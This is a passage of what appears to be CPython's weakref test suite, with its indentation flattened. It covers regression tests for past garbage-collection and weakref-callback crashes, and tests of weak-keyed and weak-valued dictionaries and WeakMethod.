# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
@support.impl_detail(pypy=False)
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
@support.impl_detail(pypy=False)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
gc_collect() # For PyPy or other GCs.
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
print(next(it))
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
gc.collect()
print(list(dct.items()))
n2 = len(dct)
print(len(dct))
print(weakref)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
@support.impl_detail(pypy=False)
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
gc_collect() # For PyPy or other GCs.
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_valued_union_operators(self):
a = C()
b = C()
c = C()
wvd1 = weakref.WeakValueDictionary({1: a})
wvd2 = weakref.WeakValueDictionary({1: b, 2: a})
wvd3 = wvd1.copy()
d1 = {1: c, 3: b}
pairs = [(5, c), (6, b)]
tmp1 = wvd1 | wvd2 # Between two WeakValueDictionaries
self.assertEqual(dict(tmp1), dict(wvd1) | dict(wvd2))
self.assertIs(type(tmp1), weakref.WeakValueDictionary)
wvd1 |= wvd2
self.assertEqual(wvd1, tmp1)
tmp2 = wvd2 | d1 # Between WeakValueDictionary and mapping
self.assertEqual(dict(tmp2), dict(wvd2) | d1)
self.assertIs(type(tmp2), weakref.WeakValueDictionary)
wvd2 |= d1
self.assertEqual(wvd2, tmp2)
tmp3 = wvd3.copy() # Between WeakValueDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wvd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakValueDictionary)
tmp4 = d1 | wvd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wvd3))
self.assertIs(type(tmp4), weakref.WeakValueDictionary)
del a
gc_collect() # For PyPy or other GCs.
self.assertNotIn(2, tmp1)
self.assertNotIn(2, tmp2)
self.assertNotIn(1, tmp3)
self.assertNotIn(1, tmp4)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
